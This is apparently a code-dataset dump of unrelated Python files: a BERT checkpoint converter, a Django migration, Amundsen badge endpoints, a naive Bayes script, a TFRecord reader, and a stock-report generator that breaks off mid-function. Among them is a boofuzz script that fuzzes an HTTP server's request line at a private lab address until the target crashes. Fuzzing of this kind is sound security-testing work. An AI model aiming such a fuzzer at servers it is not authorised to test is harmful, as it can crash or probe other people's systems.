blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2 values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 213 values | src_encoding stringclasses 30 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 2 10.3M | extension stringclasses 246 values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
92754d9d47c8bfc380e97bec2f9b21fca55de57f | ac3d3a45d7d6923bc0668bcdd38de31972860eaa | /HackerRank/1.Python/05.Math/004.ModDivmod.py | e0e5337b1eab7a6cc8ee60033f97072f53ba5b17 | [] | no_license | darpan-jain/DS-And-Algos | c17388d28ad6c1fc113e2da783904eb38a59223f | a9e54a4f1ac6ef0c1d5b056ca18dc59efdc3c648 | refs/heads/master | 2023-01-15T12:43:26.495033 | 2020-11-16T06:28:21 | 2020-11-16T06:28:21 | 294,034,130 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 471 | py | '''
Question : Read in two integers, a and b, and print three lines.
The first line is the integer division a//b.
The second line is the result of the modulo operator a%b.
The third line prints the divmod of a and b.
Link : https://www.hackerrank.com/challenges/python-mod-divmod/problem
'''
if __name__ == '__main__':
a = int(input())
b = int(input())
print(a // b)
print(a % b)
print(divmod(a , b))
| [
"noreply@github.com"
] | darpan-jain.noreply@github.com |
1a46332d256e0dfb90a730c3e144107fa8174cc5 | dd75ee3b5f9a4fa5c62dcd06df9b3847cacac515 | /src/transformers/convert_bert_original_tf2_checkpoint_to_pytorch.py | 0e37b24246ffc48cda0201db600653ca290e8dd5 | [
"Apache-2.0"
] | permissive | Aayushk26/transformers | 95da496c6186d4042b7c3cc94cb4d150b708851c | cfa26d2b412ac3494eef06506004ca857c115ad9 | refs/heads/master | 2022-12-08T04:52:07.944070 | 2020-08-18T12:38:54 | 2020-08-18T12:38:54 | 288,476,543 | 1 | 0 | Apache-2.0 | 2020-08-18T14:20:05 | 2020-08-18T14:20:05 | null | UTF-8 | Python | false | false | 9,650 | py | """
This script can be used to convert a head-less TF2.x Bert model to PyTorch,
as published on the official GitHub: https://github.com/tensorflow/models/tree/master/official/nlp/bert
TF2.x uses different variable names from the original BERT (TF 1.4) implementation.
The script re-maps the TF2.x Bert weight names to the original names, so the model can be imported with Huggingface/transformer.
You may adapt this script to include classification/MLM/NSP/etc. heads.
"""
import argparse
import logging
import os
import re
import tensorflow as tf
import torch
from transformers import BertConfig, BertModel
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
def load_tf2_weights_in_bert(model, tf_checkpoint_path, config):
tf_path = os.path.abspath(tf_checkpoint_path)
logger.info("Converting TensorFlow checkpoint from {}".format(tf_path))
# Load weights from TF model
init_vars = tf.train.list_variables(tf_path)
names = []
arrays = []
layer_depth = []
for full_name, shape in init_vars:
# logger.info("Loading TF weight {} with shape {}".format(name, shape))
name = full_name.split("/")
if full_name == "_CHECKPOINTABLE_OBJECT_GRAPH" or name[0] in ["global_step", "save_counter"]:
logger.info(f"Skipping non-model layer {full_name}")
continue
if "optimizer" in full_name:
logger.info(f"Skipping optimization layer {full_name}")
continue
if name[0] == "model":
# ignore initial 'model'
name = name[1:]
# figure out how many levels deep the name is
depth = 0
for _name in name:
if _name.startswith("layer_with_weights"):
depth += 1
else:
break
layer_depth.append(depth)
# read data
array = tf.train.load_variable(tf_path, full_name)
names.append("/".join(name))
arrays.append(array)
logger.info(f"Read a total of {len(arrays):,} layers")
# Sanity check
if len(set(layer_depth)) != 1:
raise ValueError(f"Found layer names with different depths (layer depth {list(set(layer_depth))})")
layer_depth = list(set(layer_depth))[0]
if layer_depth != 1:
raise ValueError(
"The model contains more than just the embedding/encoder layers. This script does not handle MLM/NSP heads."
)
# convert layers
logger.info("Converting weights...")
for full_name, array in zip(names, arrays):
name = full_name.split("/")
pointer = model
trace = []
for i, m_name in enumerate(name):
if m_name == ".ATTRIBUTES":
# variable names end with .ATTRIBUTES/VARIABLE_VALUE
break
if m_name.startswith("layer_with_weights"):
layer_num = int(m_name.split("-")[-1])
if layer_num <= 2:
# embedding layers
# layer_num 0: word_embeddings
# layer_num 1: position_embeddings
# layer_num 2: token_type_embeddings
continue
elif layer_num == 3:
# embedding LayerNorm
trace.extend(["embeddings", "LayerNorm"])
pointer = getattr(pointer, "embeddings")
pointer = getattr(pointer, "LayerNorm")
elif layer_num > 3 and layer_num < config.num_hidden_layers + 4:
# encoder layers
trace.extend(["encoder", "layer", str(layer_num - 4)])
pointer = getattr(pointer, "encoder")
pointer = getattr(pointer, "layer")
pointer = pointer[layer_num - 4]
elif layer_num == config.num_hidden_layers + 4:
# pooler layer
trace.extend(["pooler", "dense"])
pointer = getattr(pointer, "pooler")
pointer = getattr(pointer, "dense")
elif m_name == "embeddings":
trace.append("embeddings")
pointer = getattr(pointer, "embeddings")
if layer_num == 0:
trace.append("word_embeddings")
pointer = getattr(pointer, "word_embeddings")
elif layer_num == 1:
trace.append("position_embeddings")
pointer = getattr(pointer, "position_embeddings")
elif layer_num == 2:
trace.append("token_type_embeddings")
pointer = getattr(pointer, "token_type_embeddings")
else:
raise ValueError("Unknown embedding layer with name {full_name}")
trace.append("weight")
pointer = getattr(pointer, "weight")
elif m_name == "_attention_layer":
# self-attention layer
trace.extend(["attention", "self"])
pointer = getattr(pointer, "attention")
pointer = getattr(pointer, "self")
elif m_name == "_attention_layer_norm":
# output attention norm
trace.extend(["attention", "output", "LayerNorm"])
pointer = getattr(pointer, "attention")
pointer = getattr(pointer, "output")
pointer = getattr(pointer, "LayerNorm")
elif m_name == "_attention_output_dense":
# output attention dense
trace.extend(["attention", "output", "dense"])
pointer = getattr(pointer, "attention")
pointer = getattr(pointer, "output")
pointer = getattr(pointer, "dense")
elif m_name == "_output_dense":
# output dense
trace.extend(["output", "dense"])
pointer = getattr(pointer, "output")
pointer = getattr(pointer, "dense")
elif m_name == "_output_layer_norm":
# output dense
trace.extend(["output", "LayerNorm"])
pointer = getattr(pointer, "output")
pointer = getattr(pointer, "LayerNorm")
elif m_name == "_key_dense":
# attention key
trace.append("key")
pointer = getattr(pointer, "key")
elif m_name == "_query_dense":
# attention query
trace.append("query")
pointer = getattr(pointer, "query")
elif m_name == "_value_dense":
# attention value
trace.append("value")
pointer = getattr(pointer, "value")
elif m_name == "_intermediate_dense":
# attention intermediate dense
trace.extend(["intermediate", "dense"])
pointer = getattr(pointer, "intermediate")
pointer = getattr(pointer, "dense")
elif m_name == "_output_layer_norm":
# output layer norm
trace.append("output")
pointer = getattr(pointer, "output")
# weights & biases
elif m_name in ["bias", "beta"]:
trace.append("bias")
pointer = getattr(pointer, "bias")
elif m_name in ["kernel", "gamma"]:
trace.append("weight")
pointer = getattr(pointer, "weight")
else:
logger.warning(f"Ignored {m_name}")
# for certain layers reshape is necessary
trace = ".".join(trace)
if re.match(r"(\S+)\.attention\.self\.(key|value|query)\.(bias|weight)", trace) or re.match(
r"(\S+)\.attention\.output\.dense\.weight", trace
):
array = array.reshape(pointer.data.shape)
if "kernel" in full_name:
array = array.transpose()
if pointer.shape == array.shape:
pointer.data = torch.from_numpy(array)
else:
raise ValueError(
f"Shape mismatch in layer {full_name}: Model expects shape {pointer.shape} but layer contains shape: {array.shape}"
)
logger.info(f"Successfully set variable {full_name} to PyTorch layer {trace}")
return model
def convert_tf2_checkpoint_to_pytorch(tf_checkpoint_path, config_path, pytorch_dump_path):
# Instantiate model
logger.info(f"Loading model based on config from {config_path}...")
config = BertConfig.from_json_file(config_path)
model = BertModel(config)
# Load weights from checkpoint
logger.info(f"Loading weights from checkpoint {tf_checkpoint_path}...")
load_tf2_weights_in_bert(model, tf_checkpoint_path, config)
# Save pytorch-model
logger.info(f"Saving PyTorch model to {pytorch_dump_path}...")
torch.save(model.state_dict(), pytorch_dump_path)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--tf_checkpoint_path", type=str, required=True, help="Path to the TensorFlow 2.x checkpoint path."
)
parser.add_argument(
"--bert_config_file",
type=str,
required=True,
help="The config json file corresponding to the BERT model. This specifies the model architecture.",
)
parser.add_argument(
"--pytorch_dump_path",
type=str,
required=True,
help="Path to the output PyTorch model (must include filename).",
)
args = parser.parse_args()
convert_tf2_checkpoint_to_pytorch(args.tf_checkpoint_path, args.bert_config_file, args.pytorch_dump_path)
| [
"noreply@github.com"
] | Aayushk26.noreply@github.com |
5dc3567616c55e88f1045f9cd29aff35cb16c9cc | 210b54b07543bb2a8ecf060595d7398c8a01d477 | /183.Generator Comprehension - Python tutorial 181.py | 7c03910b6b11616877cad3454ecacc6da2340451 | [] | no_license | ArifSanaullah/Python_codes | 059482f8096fd14f2331e7bcf512b33727a5ac45 | d99f43bf6a6bc49fcd4ee57704427ef42618cb30 | refs/heads/master | 2020-05-28T09:31:07.939306 | 2019-05-28T06:11:46 | 2019-05-28T06:11:46 | 188,956,563 | 0 | 0 | null | 2019-05-28T05:54:04 | 2019-05-28T04:56:56 | Python | UTF-8 | Python | false | false | 157 | py | # 183.Generator Comprehension - Python tutorial 181
square = (i**2 for i in range(1,11))
for i in square:
print(i)
for i in square:
print(i) | [
"noreply@github.com"
] | ArifSanaullah.noreply@github.com |
a77b59525465fe6d04d96b76b95fc579ef7c18ee | 5db0ec765300952cd35c3b285b811330ac0dc882 | /blog/migrations/0001_initial.py | 759607b6c97d195cd87efea10641d0ef03a8de61 | [] | no_license | igorlimasan/my-first-blog | 4d0705c68e29d4456ca60ec1a123114e844a8bb8 | abe0aace813071686ea42e8d480a8f01ed719c74 | refs/heads/master | 2020-03-21T10:02:39.227040 | 2018-06-23T20:28:15 | 2018-06-23T20:28:15 | 138,430,965 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 986 | py | # Generated by Django 2.0.6 on 2018-06-23 20:08
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200)),
('text', models.TextField()),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"igorlimadossantos.igorlimasan@gmail.com"
] | igorlimadossantos.igorlimasan@gmail.com |
9613945776b69a0fff44683c84fd948fb7958ec4 | 925a558e70aa4559ef72727f82137ee7259af1f8 | /metadata/metadata_service/api/badge.py | 8dfe4a464e74eeb23a2b8a9e5d861c9b711b9202 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | louisnow/amundsen | 6f523d4bcbe8644669e0a7c5e1bc42560a066126 | 0b871cb58ca32e7ce150c5f60815e9f6801c10bc | refs/heads/main | 2023-07-08T09:52:59.807957 | 2021-08-10T07:15:03 | 2021-08-10T08:49:28 | 394,553,691 | 1 | 0 | Apache-2.0 | 2021-08-10T06:50:18 | 2021-08-10T06:50:17 | null | UTF-8 | Python | false | false | 4,348 | py | # Copyright Contributors to the Amundsen project.
# SPDX-License-Identifier: Apache-2.0
from http import HTTPStatus
from typing import Any, Iterable, Mapping, Tuple, Union
from amundsen_common.entity.resource_type import ResourceType
from flasgger import swag_from
from flask import current_app as app
from flask_restful import Resource, fields, marshal
from metadata_service.entity.badge import Badge
from metadata_service.exception import NotFoundException
from metadata_service.proxy import get_proxy_client
from metadata_service.proxy.base_proxy import BaseProxy
badge_fields = {
'badge_name': fields.String,
'category': fields.String,
}
badges_fields = {
'badges': fields.List(fields.Nested(badge_fields))
}
class BadgeAPI(Resource):
def __init__(self) -> None:
self.client = get_proxy_client()
super(BadgeAPI, self).__init__()
@swag_from('swagger_doc/badge/badge_get.yml')
def get(self) -> Iterable[Union[Mapping, int, None]]:
"""
API to get all existing badges
"""
badges = self.client.get_badges()
return marshal({'badges': badges}, badges_fields), HTTPStatus.OK
class BadgeCommon:
def __init__(self, client: BaseProxy) -> None:
self.client = client
def put(self, id: str, resource_type: ResourceType,
badge_name: str,
category: str = '') -> Tuple[Any, HTTPStatus]:
if category == '':
return \
{'message': f'The badge {badge_name} for resource id {id} is not added successfully because '
f'category `{category}` parameter is required '
'for badges'}, \
HTTPStatus.NOT_FOUND
# TODO check resource type is column when adding a badge of category column after
# implementing column level badges
whitelist_badges = app.config.get('WHITELIST_BADGES', [])
incomimg_badge = Badge(badge_name=badge_name,
category=category)
# need to check whether the badge combination is part of the whitelist:
in_whitelist = False
for badge in whitelist_badges:
if incomimg_badge.badge_name == badge.badge_name and incomimg_badge.category == badge.category:
in_whitelist = True
if not in_whitelist:
return \
{'message': f'The badge {badge_name} with category {category} for resource '
f'id {id} and resource_type {resource_type.name} is not added successfully because '
'this combination of values is not part of the whitelist'}, \
HTTPStatus.NOT_FOUND
try:
self.client.add_badge(id=id,
badge_name=badge_name,
category=category,
resource_type=resource_type)
return {'message': f'The badge {badge_name} with category {category} was '
f'added successfully to resource with id {id}'}, HTTPStatus.OK
except Exception as e:
return {'message': f'The badge {badge_name} with category {category} '
f'for resource id {id} and resource_type {resource_type.name} failed to '
'be added'}, \
HTTPStatus.NOT_FOUND
def delete(self, id: str, badge_name: str,
category: str,
resource_type: ResourceType) -> Tuple[Any, HTTPStatus]:
try:
self.client.delete_badge(id=id,
resource_type=resource_type,
badge_name=badge_name,
category=category)
return \
{'message': f'The badge {badge_name} with category {category} for resource '
f'id {id} and resource_type {resource_type.name} was deleted successfully'}, \
HTTPStatus.OK
except NotFoundException:
return \
{'message': f'The badge {badge_name} with category {category} for resource '
f'id {id} and resource_type {resource_type.name} was not deleted successfully'}, \
HTTPStatus.NOT_FOUND
| [
"noreply@github.com"
] | louisnow.noreply@github.com |
99d5b758ec79459222cf162676506bc77b04cc10 | b3569dbb9fdc5ef9ba49ca7a548621f621f60e34 | /practice/efsws/http_fuzzer.py | 5258707ae1bbd76d9f6ba686f2558f59483cc290 | [] | no_license | solucionestux/OSCE | 99a0e2aab30be018a3c3a933109abe2858e46f0e | 4b394b1a293e0ab804e402506e73b1623118f53f | refs/heads/master | 2023-03-15T22:54:25.808533 | 2020-08-24T02:31:10 | 2020-08-24T02:31:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,899 | py | #!/usr/bin/python
from boofuzz import *
from sys import exit
host = '192.168.1.250'
port = 80
# Checks if the connection is still open or if a banner is sent back. If not, the fuzzer quits. Good for stopping the script after crashing the program.
def get_banner(target, my_logger, session, *args, **kwargs):
banner_template = "Please enter your username and password to login"
try:
banner = target.recv(10000)
except:
print "Unable to connect. Target is down. Exiting."
exit(1)
my_logger.log_check('Receiving banner..')
if banner_template in banner:
my_logger.log_pass('banner received')
else:
my_logger.log_fail('No banner received')
print "No banner received, exiting.."
exit(1)
def main():
# Create logging function. Outputs to a .csv file
csv_log = open('fuzz_results.csv', 'wb') ## create a csv file
my_logger = [FuzzLoggerCsv(file_handle=csv_log)] ### create a FuzzLoggerCSV object with the file handle of our csv file
# Create the session and set the logging function
session = Session(
target=Target(
connection = SocketConnection(host, port, proto='tcp'),
),
fuzz_loggers=my_logger, ## set my_logger (csv) as the logger for the session
)
# Define the parameters to fuzz.
s_initialize(name="Request")
with s_block("Request-Line"):
s_group("Method", ['GET', 'HEAD', 'POST', 'PUT', 'DELETE', 'CONNECT', 'OPTIONS', 'TRACE'])
s_delim(" ", name='space-1', fuzzable = False)
s_string("/login.htm", name='Request-URI')
s_delim(" ", name='space-2', fuzzable = False)
s_string('HTTP/1.1', name='HTTP-Version', fuzzable = False)
s_static("\r\n", name="Request-Line-CRLF")
s_static("\r\n", "Request-CRLF")
session.connect(s_get("Request"))
session.fuzz() # call the function to begin fuzzing
if __name__ == "__main__":
main() | [
"noreply@github.com"
] | solucionestux.noreply@github.com |
9f53a446aba2f9f7ee04a17301a5b4a1ff43edcb | 5bf3252e94d9357adbec2153036cde0e4bb755f7 | /nb.py | 13fdd36b9fd9c19d37bbb8d9d832333fb8d5ccbe | [] | no_license | gowtham1197/Android-Malware-Detection | 9a4d2277b70a56c174f86398bcde73d7665af884 | df769f6c88caf177bba3c6981a62000852003d68 | refs/heads/master | 2021-04-03T07:48:47.415366 | 2018-03-13T18:29:36 | 2018-03-13T18:29:36 | 125,095,659 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,835 | py | import csv
import math
def gaus(A,cl,col,l, fold_size):
count=0.0
sum1=0.0
dsq=0.0
#print "Training"
for i in range(no_row):
if(i>=l and i<l+ fold_size):
continue
if(actual[dataset[i][no_col]]==cl):
sum1+=float(dataset[i][col])
count+=1
u=sum1/count
for i in range(no_row):
if(i>=l and i<l+ fold_size):
continue
if(actual[dataset[i][no_col]]==cl):
diff=float(dataset[i][col])-u
dsq+=diff*diff
varience=dsq/(count-1)
std=math.sqrt(varience)
power=-((A-u)*(A-u))/(2*varience)
nume=math.exp(power)
den=math.sqrt(2*math.pi)*std
ans=nume/den
#print("ans:",ans)
return ans
def crossvalid(prob1,prob2, fold_size):
l=0
count=0
eravg=0.0
#print no_row
k=1
#print "Testing"
while(l<no_row):
ans=[]
act=[]
errate=0.0
err=0.0
#print("Training")
for i in range(no_row):
if(not(i>=l and i<l+fold_size)):
continue
#print("prob1",prob1)
pro1=prob1
pro2=prob2
act.append((actual[dataset[i][no_col]])*0.1)
#print(pro1)
#print(pro2)
for j in range(no_col):
pro1*=gaus(float(dataset[i][j]),0.0,j,l, fold_size)
pro2*=gaus(float(dataset[i][j]),1.0,j,l, fold_size)
if(pro1>pro2):
ans1=0.0
ans.append(ans1)
else:
ans1=1.0
ans.append(ans1)
if(ans1!=actual[dataset[i][no_col]]):
err+=1
print ans
print act
errate=err/ fold_size
print('Fold %d' %k)
erate=errate*100
print('Error Rate %f' %erate)
srate=(1-errate)*100
print('Success Rate %f' %srate)
#print errate
k+=1
eravg+=errate
count+=1
l+=fold_size
#print("count",count)
#print count
eravg=eravg/count
return (1-eravg)
def nb(fold_size):
p1=0.0
p2=0.0
#print(no_row)
for i in range(no_row):
if(actual[dataset[i][no_col]]==0):
p1+=1
else:
p2+=1
prob1=p1/no_row
prob2=p2/no_row
print ("Probability of occurance of class R : %f" %prob1)
print ("Probability of occurance of class M : %f" %prob2)
return (crossvalid(prob1,prob2, fold_size))
dataset = list(list())
option=input("1.Sonar 2.Iris 3.Spectf 4.Diabetes\n")
if(option==1):
filename = 'sonar.csv'
elif(option==2):
filename = 'iris.csv'
elif(option==3):
filename = 'spectf.csv'
else:
filename = 'diabetes.csv'
with open(filename, 'rb') as csvfile:
r = csv.reader(csvfile)
for k,i in enumerate(r):
#if k==0:
# continue
dataset.append(i)
no_col = len(dataset[1])-1
print("No.of features in the current dataset are %d" %no_col)
no_row = len(dataset)
fold_size=no_row/10
cvs=[]
for i in range(len(dataset)):
cvs.append(dataset[i][-1])
actual1=set(cvs)
actual1=list(actual1)
#actual1[0]=1.0
#actual1[1]=0.0
#for i in range(len(actual1)):
#print(dataset[i])
actual = { actual1[0] : 1, actual1[1] : 0}
#print actual
prob1=0.0
prob2=0.0
print("the average accuracy rate is:" ,nb(fold_size)*100)
| [
"noreply@github.com"
] | gowtham1197.noreply@github.com |
dd2000e4cda97744f227d10a8d58549238968293 | 570d589e9b56ab2e1f5f595f48ee05924f7f6cae | /Python/Django_projects/model_practice/apps/model/models.py | a389b166c3b48dff9117d493e35789250fbc4dcd | [] | no_license | WillieShubert/DojoAssignments | 96853f019210fcbc384ac6b4c69450f31b4e47d4 | 1687399427dda566551dcd221de824a913dbe3ee | refs/heads/master | 2021-01-11T17:53:43.824115 | 2017-05-05T18:09:30 | 2017-05-05T18:09:30 | 79,863,541 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 335 | py | from __future__ import unicode_literals
from django.db import models
# Create your models here.
class People(models.Model):
first_name = models.CharField(max_length=38)
last_name = models.CharField(max_length= 38)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
| [
"noreply@github.com"
] | WillieShubert.noreply@github.com |
8be1ab78dd73cd3dcca83e57b7dd6dead0a5058d | 7f4fae8e0a9e29fc3abee784a2d7d0beb8252bd5 | /typings/wulifang/vendor/pathlib2_unicode/__version__.pyi | 3f08878a765c1a960e0eabcbf37496a185f773f2 | [] | no_license | WuLiFang/Nuke | a303646e927c9745f2eaf8dad4e5e1ccc09a30e7 | 49df48ded0985771147b1a40707b5454291eab19 | refs/heads/master | 2023-07-21T13:36:27.423572 | 2023-07-17T10:34:04 | 2023-07-17T10:34:04 | 100,696,180 | 16 | 5 | null | 2020-03-08T11:50:16 | 2017-08-18T09:28:26 | Python | UTF-8 | Python | false | false | 420 | pyi | """
This type stub file was generated by pyright.
"""
import datetime as _dt
import six
VERSION: six.text_type
RELEASE_DATE: _dt.datetime
LAST_GIT_COMMIT_DESCRIBE: six.text_type
LAST_GIT_COMMIT_HASH: six.text_type
LAST_GIT_COMMIT_AUTHOR_NAME: six.text_type
LAST_GIT_COMMIT_AUTHOR_EMAIL: six.text_type
LAST_GIT_COMMIT_AUTHOR_DATE: _dt.datetime
LAST_GIT_COMMIT_SUBJECT: six.text_type
LAST_GIT_COMMIT_BODY: six.text_type
| [
"NateScarlet@Gmail.com"
] | NateScarlet@Gmail.com |
d3be4a6716e2f39f4f4bbaa448772970dd601f3c | c66f4f5eee07a5c2617d61f3a2eee988ac18e150 | /tutorial/read_real_record.py | 64debd01db184a38e9f45fb5aa7fe7bb3409c4bd | [] | no_license | ykicisk/TFModel | 65705f621cb39b4e00ccba281bce604103d2e8bb | f968e2ef2c47eff7cb74e5b2a6828736d1fbadb1 | refs/heads/master | 2021-01-12T02:31:43.467723 | 2017-01-04T22:17:19 | 2017-01-04T22:17:19 | 78,057,319 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,004 | py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
import glob
import argparse as ap
import tensorflow as tf
def main(src_glob):
print "get filepaths"
filepaths = glob.glob(src_glob)
print "reader test!!"
num_epochs = None
file_queue = tf.train.string_input_producer(filepaths,
num_epochs=num_epochs,
shuffle=True)
reader = tf.TFRecordReader()
key, selialized_data = reader.read(file_queue) # key => filepath:num
print type(key), type(selialized_data)
# dim
features_dict = {
"daily": tf.FixedLenFeature([5, 56], tf.float32),
"weekly": tf.FixedLenFeature([5, 58], tf.float32),
"monthly": tf.FixedLenFeature([5,58], tf.float32),
"label": tf.FixedLenFeature([5,1], tf.float32)
}
features = tf.parse_single_example(selialized_data,
features=features_dict)
batch_size = 10
# min_after_dequeue defines how big a buffer we will randomly sample
# from -- bigger means better shuffling but slower start up and more
# memory used.
# capacity must be larger than min_after_dequeue and the amount larger
# determines the maximum we will prefetch. Recommendation:
# min_after_dequeue + (num_threads + a small safety margin) * batch_size
num_threads = 1
min_after_dequeue = batch_size * 100
capacity = min_after_dequeue + 3 * batch_size
features_batch = tf.train.shuffle_batch(
features,
batch_size=batch_size,
capacity=capacity,
min_after_dequeue=min_after_dequeue,
num_threads=num_threads,
allow_smaller_final_batch=True
)
print type(features_batch)
for fgroup, batch in features_batch.items():
print fgroup, type(batch)
init_op = [tf.initialize_all_variables(),
tf.initialize_local_variables()]
with tf.Session() as sess:
sess.run(init_op)
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(sess=sess, coord=coord)
try:
# ミニバッチ処理ループ
while not coord.should_stop():
key_ = sess.run(key)
print key_
sample = sess.run(features_batch.values())
print sample
# 学習等の処理
except tf.errors.OutOfRangeError:
print "epoch end"
finally:
print "===finally==="
coord.request_stop()
coord.join(threads)
if __name__ == "__main__":
description = """start"""
class Formatter(ap.ArgumentDefaultsHelpFormatter,
ap.RawDescriptionHelpFormatter):
pass
parser = ap.ArgumentParser(description=description,
formatter_class=Formatter)
parser.add_argument("src", help="input tfrecord path (glob format)")
args = parser.parse_args()
main(args.src)
| [
"ykic.p3@gmail.com"
] | ykic.p3@gmail.com |
2ff241ddae7ce20a14a31ed89f2e7691d480791e | 67078e85453fdf9ee0b66ef5576904b3dfef5ab3 | /atheppy/heppyresult/ReadCounter.py | bbe669dca181716c1542b40b17bc76db42a93a24 | [
"BSD-3-Clause"
] | permissive | alphatwirl/atheppy | d72c45fc60ad1576107baca8e7ce14292edb9a85 | e4cbc070c2313f283053383edb629bb3cb80807e | refs/heads/master | 2021-04-27T04:17:31.146963 | 2018-05-22T18:20:09 | 2018-05-22T18:20:09 | 122,729,106 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,442 | py | # Tai Sakuma <tai.sakuma@gmail.com>
##__________________________________________________________________||
import re
import collections
import ast
import os
##__________________________________________________________________||
class ReadCounter(object):
def __call__(self, path):
if not os.path.isfile(path): return None
file = open(path)
return self._readImp(file)
def _readImp(self, file):
counter = collections.OrderedDict()
file.readline() # skip the 1st line
for line in file:
level, content = self._readLine(line)
if level is None: continue
counter[level] = content
return counter
def _readLine(self, line):
# a line is written in the format '\t {level:<40} {count:>9} \t {eff1:4.2f} \t {eff2:6.4f}\n'
# https://github.com/cms-sw/cmssw/blob/CMSSW_7_4_0/PhysicsTools/HeppyCore/python/statistics/counter.py
exp = r'^\t (.*?) *([0-9e+-.]*) \t ([0-9e+-.]*) \t ([0-9e+-.]*)$'
exp = exp.encode()
match = re.search(exp, line)
if not match: return None, None
level = match.group(1)
count = match.group(2)
eff1 = match.group(3)
eff2 = match.group(4)
count = count.decode()
return level, dict(count = ast.literal_eval(count), eff1 = float(eff1), eff2 = float(eff2))
##__________________________________________________________________||
| [
"tai.sakuma@gmail.com"
] | tai.sakuma@gmail.com |
716bc9d348cf58bb1e32918f5b7fa16dfe239e62 | f63282dac793d4b028e752aa40d16085ef8bc1cd | /prof/migrations/0003_delete_log.py | a886bec6c499362853e56ebea58cb7726eb9bfb3 | [] | no_license | 13alireza77/twitter_api | 2b56e32fc5d2638c008417e02defeb7018b2c234 | 05d867975fe190e35134861d1dee84135d2fd523 | refs/heads/main | 2023-02-26T05:41:51.314613 | 2021-01-28T09:45:53 | 2021-01-28T09:45:53 | 332,535,531 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 289 | py | # Generated by Django 3.1.5 on 2021-01-26 18:09
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('prof', '0002_auto_20210126_2123'),
]
operations = [
migrations.DeleteModel(
name='Log',
),
]
| [
"13alirezaalidoosti77@gmail.com"
] | 13alirezaalidoosti77@gmail.com |
ffd37d761c61abf2e0efaa93716912c96b6c32b4 | fa3414ad102838f5473b602193c8d0d15bde0b31 | /Stock/reports.py | 32fedde9c1d8f0e47feaeace868ffa0018bd4d52 | [] | no_license | MCRogersI/Panorama | e8df9c0ed56155fbc5e9a91d3a370acfe101e902 | 225c237bde18afee977386e72bd72ebdd8912643 | refs/heads/master | 2020-05-23T10:20:55.735430 | 2017-09-11T02:33:06 | 2017-09-11T02:33:06 | 80,423,505 | 1 | 1 | null | 2017-01-30T15:09:03 | 2017-01-30T13:25:47 | null | UTF-8 | Python | false | false | 8,230 | py | from pony.orm import *
from datetime import date, timedelta
import pandas as pd
import numpy as np
from openpyxl import Workbook, load_workbook, drawing
from openpyxl.styles import Font
import openpyxl
from openpyxl import Workbook
from openpyxl.chart import BarChart, Series, Reference
from openpyxl.styles.borders import Border, Side
from openpyxl.styles import Font,Alignment
from openpyxl.styles import PatternFill
from openpyxl.drawing.fill import PatternFillProperties, ColorChoice
from openpyxl.chart.marker import DataPoint
import os
def createStockReport(db):
thin_border = Border(left=Side(style='thin'),
right=Side(style='thin'),
top=Side(style='thin'),
bottom=Side(style='thin'))
from Stock.features import displayStock, calculateStockForExcel
with db_session:
skus = select(s for s in db.Stock).order_by(lambda s : s.id)
skus_ids = [sku.id for sku in skus]
skus_critical_levels = [sku.critical_level for sku in skus]
skus_names = [sku.name for sku in skus]
bases = [calculateStockForExcel(db, id) for id in skus_ids]
# wb = Workbook(write_only=True, guess_types=True) # Atención con el guess_types y el write_only
# wb = Workbook(write_only=False, guess_types=True)
wb = Workbook(write_only=False)
by_default_sheet = wb.get_sheet_by_name('Sheet')
wb.remove_sheet(by_default_sheet)
ws_raw = wb.create_sheet(title="Tablas de Stock")
ws_plotted = wb.create_sheet(title="Gráficos de Stock", index=0)
ws_raw.sheet_view.zoomScale = 30 #Para "alejar" el zoom de la hoja
ws_plotted.sheet_view.zoomScale = 30 #Para "alejar" el zoom de la hoja
counter = 0
id_counter = 0 #Arreglar para que quede más compacto y limpio
for b in bases:
base = b
dates = base[0]
values = base[1]
id_counter+=1
current_sku_id = skus_ids[id_counter-1]
current_sku_critical_level = skus_critical_levels[id_counter-1]
current_sku_name = skus_names[id_counter-1]
# rows = [
# ('Fechas', 'Cantidad', 'Batch 2'),
# (2, 10, 30),
# (3, 40, 60),
# (4, 50, 70),
# (5, 20, 10),
# (6, 10, 40),
# (7, 50, 30),
# ]
# vals = [(i,np.sqrt(i)) for i in range(0,20)]
vals = zip(dates, values)
